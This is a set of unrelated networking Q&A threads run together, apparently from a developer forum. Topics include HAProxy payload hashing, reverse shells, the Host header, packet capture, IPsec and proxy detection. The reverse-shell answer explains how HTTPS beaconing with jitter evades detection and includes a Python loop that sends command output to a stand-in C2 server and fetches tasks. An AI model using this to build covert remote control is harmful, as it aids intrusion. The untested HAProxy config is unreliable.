I have a scenario where I need to route TCP traffic to a dynamic set of backend servers (Kubernetes pods, to be exact, but we can ignore that for the purposes of this post) through a proxy like HAProxy or nginx. The traffic needs to be routed based on a key (call it the routing_key) provided by the client in the TCP payload.
I see that both nginx and HAProxy support consistent hashing. However, from what I can tell based on HAProxy's manual (see "balance" section), there's no way to perform consistent hashing based on a TCP payload. Payload-based load balancing seems to be limited to L7 HTTP parameters like Header and URI params. This post outlines a method for statically balancing based on string matching a TCP payload, but my case is more dynamic so a true consistent hashing approach is much preferred.
Nginx appears to offer a bit more flexibility in that you can set the hashing value to an arbitrary variable as shown here. This appears to work for both L7 (the "backend" stanza) and L4 (the "stream" stanza). However, I'm a bit hazy on what you are and aren't allowed to do for variables. Does anyone have an example of setting a variable to be a value extracted from the TCP payload and using that for consistent hashing?
Final bonus question: the routing_key value is actually an AES-GCM encrypted value. The proxy server would have access to the key used to decrypt this value. Is it possible to have nginx grab the routing key from the TCP payload, decrypt it using the known key, and then use the result for consistent hashing? Would that involve writing an nginScript (njs) module?
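To make the goal concrete, here is a purely illustrative Python sketch of the operation I'd like the proxy to perform; the payload framing (12-byte nonce followed by ciphertext plus tag), the helper names, and the hash ring are all my own inventions, not anything nginx provides:

import bisect
import hashlib
from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # assumes the third-party 'cryptography' package

def decrypt_routing_key(payload, key):
    # assumed framing: 12-byte nonce, then ciphertext with the 16-byte GCM tag appended
    nonce, ct_and_tag = payload[:12], payload[12:]
    return AESGCM(key).decrypt(nonce, ct_and_tag, None)

def build_ring(backends, vnodes=100):
    # classic consistent-hash ring with virtual nodes
    return sorted((int(hashlib.md5(f"{b}:{i}".encode()).hexdigest(), 16), b)
                  for b in backends for i in range(vnodes))

def pick_backend(ring, routing_key):
    h = int(hashlib.md5(routing_key).hexdigest(), 16)
    idx = bisect.bisect(ring, (h,)) % len(ring)
    return ring[idx][1]

# usage: backend = pick_backend(build_ring(["pod-a", "pod-b", "pod-c"]), decrypt_routing_key(payload, key))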
In HAProxy 2.1 you can use aes_gcm_dec(...) in combination with req.payload(...) for such a requirement.
Here is my idea, untested:
listen tcp-in
    bind :443 ssl crt /path/to/cert.pem   # placeholder certificate path
    tcp-request inspect-delay 10s
    # payload bytes are only available to content rules, not session rules
    tcp-request content set-var(sess.routingkey) req.payload(0,500)
    # for consistent hashing try this
    hash-type consistent wt6
    # txn.nonce and txn.aead_tag would still need to be populated from the payload;
    # the base64 string is just an example 128-bit AES key
    use_backend %[var(sess.routingkey),aes_gcm_dec(128,txn.nonce,Zm9vb2Zvb29mb29wZm9vbw==,txn.aead_tag)]
Here are also the links to the HTML documentation:
aes_gcm_dec
req.payload
hash-type consistent ... is described at hash-type
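For completeness, here is a rough, untested Python sketch (assuming the third-party 'cryptography' package) of how a client could produce the pieces that aes_gcm_dec consumes; how the nonce, ciphertext and tag are framed inside the TCP payload is up to you:

import base64
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=128)            # shared secret; its base64 form goes into the config (cf. the Zm9v... value above)
nonce = os.urandom(12)                               # what txn.nonce would need to carry
ct_and_tag = AESGCM(key).encrypt(nonce, b"my-routing-key", None)
ciphertext, tag = ct_and_tag[:-16], ct_and_tag[-16:] # aes_gcm_dec takes the 16-byte AEAD tag separately
print(base64.b64encode(key).decode())                # value to paste into the haproxy config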
I had made a multi-client TCP reverse shell, and then saw a course video which said HTTP reverse shells are better because it is more difficult to trace them back to the attacker compared to TCP. I didn't understand that.
I have tried googling this question without much help.
Are HTTP reverse shells actually beneficial over TCP? How?
I personally think having an HTTP reverse shell is bad since HTTP is connectionless: when the attacker wants to communicate with the host, it can't, since there is no connection to it, and the attacker can only communicate when a request (like a GET) comes from the host. Am I missing anything here?
Please explain.
First, I am just going to answer for HTTPS rather than plain HTTP, because I don't see much reason to use HTTP over HTTPS; there are a lot of benefits to encrypting your traffic this way.
It's unlikely to be auto-filtered
Many networks will block outbound traffic on all but a few special ports, so using something like port 6666 is likely to set off a few alerts. If you try to use a port for something other than its intended use, some software can use deep packet inspection (DPI) to detect or block this. In other words, if your payload tries to use port 80/443 without using HTTP/HTTPS, it may raise an alert and get your payload caught.
It's stealthier.
I would say two of the most important factors in being a stealthy payload are looking like normal traffic, so as to avoid attracting attention in the first place, and being difficult to inspect if attention does come to your connection. HTTPS accomplishes both of these rather well.
This is because on most networks it is extremely common to see nodes making requests out to the internet all the time. Compare a beaconing payload making HTTPS requests with a payload connecting out over some random port.
Now, as far as your question at the end... it depends on your situation, but you are right that there will often be a delay if you use something like HTTP(S) instead of maintaining an established connection. I alluded to this earlier, but we are able to communicate through beaconing. Essentially, that just means the payload will check back with the server on a set interval (often with a jitter to make it a little harder to detect).
The victim will make an HTTP(S) request to your command and control (C2) server that contains the results of the previous command you told it to run. Your server will return an HTTP(S) response that contains the next instructions for the payload.
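As a purely illustrative sketch (the C2 URL is hypothetical, the third-party 'requests' package is assumed, and acting on the task is left as a placeholder), the beaconing loop boils down to something like this:

import random
import time
import requests

C2_URL = "https://c2.example.com/tasks"   # hypothetical command-and-control endpoint
INTERVAL, JITTER = 60, 15                 # base check-in interval and jitter, in seconds

last_result = ""
while True:
    # one HTTPS round trip: report the previous result, receive the next instruction
    response = requests.post(C2_URL, data={"output": last_result}, timeout=10)
    task = response.text.strip()
    if task:
        # the payload would act on the task here and stash the result for the next check-in
        last_result = f"handled: {task}"
    time.sleep(INTERVAL + random.uniform(-JITTER, JITTER))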
Last week I started quite a fuss in my Computer Networks class over the need for a mandatory Host clause in the header of HTTP 1.1 GET messages.
The reason I'm provided with, be it written on the Web or shouted at me by my classmates, is always the same: the need to support virtual hosting. However, and I'll try to be as clear as possible, this does not appear to make sense.
I understand that in order to allow two domains to be hosted in a single machine (and by consequence, share the same IP address), there has to exist a way of differentiating both domain names.
What I don't understand is why it isn't possible to achieve this without a Host clause (HTTP 1.0 style) by using an absolute URL (e.g. GET http://www.example.org/index.html) instead of a relative one (e.g. GET /index.html).
When the HTTP message got to the server, it (the server) would route the request to the appropriate host, not by looking at a Host clause but by looking at the hostname in the URL present in the message's request line.
I would be very grateful if any of you hardcore hackers could help me understand what exactly I am missing here.
This was discussed in this thread:
modest suggestions for HTTP/2.0 with their rationale.
Add a header to the client request that indicates the hostname and
port of the URL which the client is accessing.
Rationale: One of the most requested features from commercial server
maintainers is the ability to run a single server on a single port
and have it respond with different top level pages depending on the
hostname in the URL.
Making an absolute request URI mandatory (because there's no way for the client to know beforehand whether the server hosts one site or several) was suggested:
Re the first proposal, to incorporate the hostname somewhere. This
would be cleanest put into the URL itself :-
GET http://hostname/fred http/2.0
This is the syntax for proxy redirects.
To which this argument was made:
Since there will be a mix of clients, some supporting host name reporting
and some not, it just doesn't matter how this info gets to the server.
Since it doesn't matter, the easier to implement solution is a new HTTP
request header field. It allows all clients and servers to operate as they
do now with NO code changes. Clients and servers that actually need host
name information can have tiny mods made to send the extra header field
containing the URL and process it.
[...]
All I'm suggesting is that there is a better way to
implement the delivery of host name info to the server that doesn't involve
hacking the request syntax and can be backwards compatible with ALL clients
and servers.
Feel free to read on to discover the final decision yourself. But be warned, it's easy to get lost in there.
The reason for adding support for specifying a host in an HTTP request was the limited supply of IP addresses (which was not an issue yet when HTTP 1.0 came out).
If your question is "why specify the host in a Host header as opposed to on the Request-Line", the answer is the need for interoperability between HTTP/1.0 and 1.1.
If the question is "why is the Host header mandatory", this has to do with the desire to speed up the transition away from assigned IP addresses.
Here's some background on the Internet address conservation with respect to HTTP/1.1.
The reason for the 'Host' header is to make explicit which host this request refers to. Without 'Host', the server must know ahead of time that it is supposed to route 'http://joesdogs.com/' to Joe's Dogs while it is supposed to route 'http://joscats.com/' to Jo's Cats even though they are on the same webserver. (What if a server has 2 names, like 'joscats.com' and 'joescats.com' that should refer to the same website?)
Having an explicit 'Host' header makes these kinds of decisions much easier to program.
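To illustrate, here is a minimal Python sketch of name-based virtual hosting (the site table is invented, reusing the example domains above); with an explicit Host header the dispatch is a one-line lookup:

from http.server import BaseHTTPRequestHandler, HTTPServer

SITES = {
    "joesdogs.com": b"<h1>Joe's Dogs</h1>",
    "joscats.com": b"<h1>Jo's Cats</h1>",
    "joescats.com": b"<h1>Jo's Cats</h1>",  # alias resolving to the same site
}

class VHostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # pick the site purely from the Host header sent by the client
        host = (self.headers.get("Host") or "").split(":")[0].lower()
        body = SITES.get(host, b"<h1>Unknown host</h1>")
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("", 8080), VHostHandler).serve_forever()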
I want to develop an application where all traffic from a network segment gets mirrored to a Windows station, so that I can see all TCP/IP request/response data (for filtering).
I know it should be possible to use WinPcap to capture all packets, but the problem in that case is that I would have to implement all the processing needed to distinguish TCP data streams (e.g. handshaking, closing, retransmissions, reordering, maybe more?). I need the stream of data because I will be doing application-level (e.g. HTTP) filtering.
I wonder if there is a driver or solution somewhere that provides me with the TCP data stream, something that could be used on a gateway machine or with port mirroring.
For starters, in WinPcap you can define something called a filter.
That filter drops all the traffic except the type you specify, so if you want to capture HTTP traffic only, I'd suggest you set a filter on TCP port 80 or whatever other port you're using for HTTP.
Once you've captured these packets, you can inspect the TCP payload, parse the HTTP header and do whatever you wish according to your system's policy.
Check this link if you want to familiarize yourself with how to use WinPcap and how to use filters (in that example they're capturing TCP traffic in general; you should add "port 80" to their filter).
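As a rough illustration, here is a hedged Python sketch using scapy (which sits on top of WinPcap/Npcap on Windows); note that it sees individual TCP segments, so the stream reassembly the question worries about is still left to you:

from scapy.all import Raw, TCP, sniff  # assumes the third-party 'scapy' package

def on_packet(pkt):
    # print the request line of anything that looks like HTTP
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        if payload.startswith(b"GET ") or payload.startswith(b"POST "):
            print(pkt[TCP].sport, "->", pkt[TCP].dport, payload.split(b"\r\n", 1)[0])

# BPF filter equivalent to the "port 80" suggestion above
sniff(filter="tcp port 80", prn=on_packet, store=False)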
Just a very general question, but can somebody tell me when I should use OpenSSL and when IPsec to secure data transfer over the internet? It seems both of them do the same thing, only at different levels of the network stack, so I am not absolutely sure why we need both of them.
Cheers for your help
Yes, they work at different levels of the network stack: one is implemented in the OS and the other in an application.
So the reason that both are needed:
IPsec can secure all traffic, including that from applications that don't use encryption. But both sides must run an OS that supports IPsec, and it must be configured by the system administrator.
SSL can secure the traffic of a single application. It does not require a particular OS, and it does not need administrator permissions to configure.
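To illustrate the "one application, no administrator" point, here is a minimal Python sketch of application-level TLS using only the standard library; an IPsec tunnel, by contrast, would be configured in the OS and be invisible to code like this:

import socket
import ssl

context = ssl.create_default_context()
with socket.create_connection(("example.com", 443)) as raw_sock:
    # the application opts in to encryption itself, no OS configuration needed
    with context.wrap_socket(raw_sock, server_hostname="example.com") as tls_sock:
        tls_sock.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n")
        print(tls_sock.recv(4096))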
You are getting it a bit wrong, buddy... IPsec is used for secure communication between two machines.
Say you want to send a packet to another machine, but you want no one to be able to determine even which protocol you are using (TCP/UDP, etc.); then you use IPsec. And that is not all, there is much more to explore about IPsec.
OpenSSL, you could say, is just a library of encryption/authentication functions.
The difference is easiest to understand with a little example.
Suppose you want to secure traffic between two machines, so you create a securely encrypted packet and send it to the other machine, where it needs to be decrypted based on security associations. All of this is part of the IPsec protocol.
Meanwhile, when encrypting the packet on your sending machine, you may have used some C/Linux functions to do the encryption. This is where OpenSSL comes into play.
Similarly, on the other end, when you capture the packet and extract the required part, you can decrypt it using the OpenSSL functions on your machine.
I tried my best to explain it... hope it helped! If you still have any doubts, do ask!
IPsec is based on a configuration file that runs in the background and encrypts all the data between two machines. This encryption is based on IP pairs, an initiator and a responder (at least that's the configuration they use at my workplace, which more or less conforms to the standards). ALL the IP traffic between the two machines is then encrypted; neither the type nor the content of the traffic is visible. It has its own encapsulation that wraps the WHOLE packet (including all the headers the packet previously had). The packet is then decapsulated (if that's a word) at the other end to recover a fully formed packet (not just the payload). The encryption itself may be provided by an SSL library (e.g. OpenSSL).
SSL, on the other hand, encrypts the data, and then you can do whatever you want with it. You can put it on a USB stick and give it to someone, keep it encrypted locally to prevent data theft, or send it over the internet or a network (in which case the packet itself won't be encrypted, only the payload, which is what SSL encrypts).
Is it possible to detect if an incoming request is being made through a proxy server? If a web application "bans" users via IP address, they could bypass this by using a proxy server. That is just one reason to block these requests. How can this be achieved?
IMHO there's no 100% reliable way to achieve this, but the presence of any of the following headers is a strong indication that the request was routed through a proxy server:
via:
forwarded:
x-forwarded-for:
client-ip:
You could also look for "proxy" or "pxy" in the client's domain name.
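As a rough, framework-agnostic illustration (the helper below and the exact header set are just an example), the check boils down to something like this:

# 'headers' is any mapping of request-header names to values, e.g. request.headers
# in your web framework; treat the result as a heuristic, not a guarantee
PROXY_HEADERS = ("via", "forwarded", "x-forwarded-for", "client-ip")

def looks_like_proxy(headers):
    names = {name.lower() for name in headers}
    return any(h in names for h in PROXY_HEADERS)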
If a proxy server is set up properly to avoid detection, you won't be able to tell.
Most proxy servers supply headers as others mention, but those are not present on proxies meant to completely hide the user.
You will need to employ several detection methods, such as cookies, proxy header detection, and perhaps IP heuristics to detect such situations. Check out http://www.osix.net/modules/article/?id=765 for some information on this situation. Also consider using a proxy blacklist - they are published by many organizations.
However, nothing is 100% certain. You can employ the above tactics to avoid most simple situations, but at the end of the day it's merely a series of packets forming a TCP/IP transaction, and the TCP/IP protocol was not developed with today's ideas on security, authentication, etc.
Keep in mind that many corporations deploy company-wide proxies for various reasons, and if you simply block proxies as a general rule you necessarily limit your audience, which may not always be desirable. These corporate proxies usually announce themselves with the appropriate headers, so by blocking proxies wholesale you may end up blocking legitimate users rather than users who are good at hiding themselves.
-Adam
Did a bit of digging on this after my domain got hosted up on Google's AppSpot.com with nice hardcore porn ads injected into it (thanks Google).
Taking a leaf from this htaccess idea, I'm doing the following, which seems to be working. I added a specific rule for AppSpot, which injects an HTTP_X_APPENGINE_COUNTRY server variable.
' Request headers / server variables that typically indicate a proxy (or the AppSpot mirror)
Dim varys As New List(Of String)
varys.Add("VIA")
varys.Add("FORWARDED")
varys.Add("USERAGENT_VIA")
varys.Add("X_FORWARDED_FOR")
varys.Add("PROXY_CONNECTION")
varys.Add("XPROXY_CONNECTION")
varys.Add("HTTP_PC_REMOTE_ADDR")
varys.Add("HTTP_CLIENT_IP")
varys.Add("HTTP_X_APPENGINE_COUNTRY")

' If any of them is present, bounce the visitor back to the canonical domain
For Each vary As String In varys
    If Not String.IsNullOrEmpty(HttpContext.Current.Request.Headers(vary)) Then
        HttpContext.Current.Response.Redirect("http://www.your-real-domain.com")
    End If
Next
You can look for these headers in the Request object and decide accordingly whether the request came via a proxy or not:
1) Via
2) X-Forwarded-For
Note that this is not a 100% sure-shot trick; it depends on whether the proxy servers choose to add the above headers.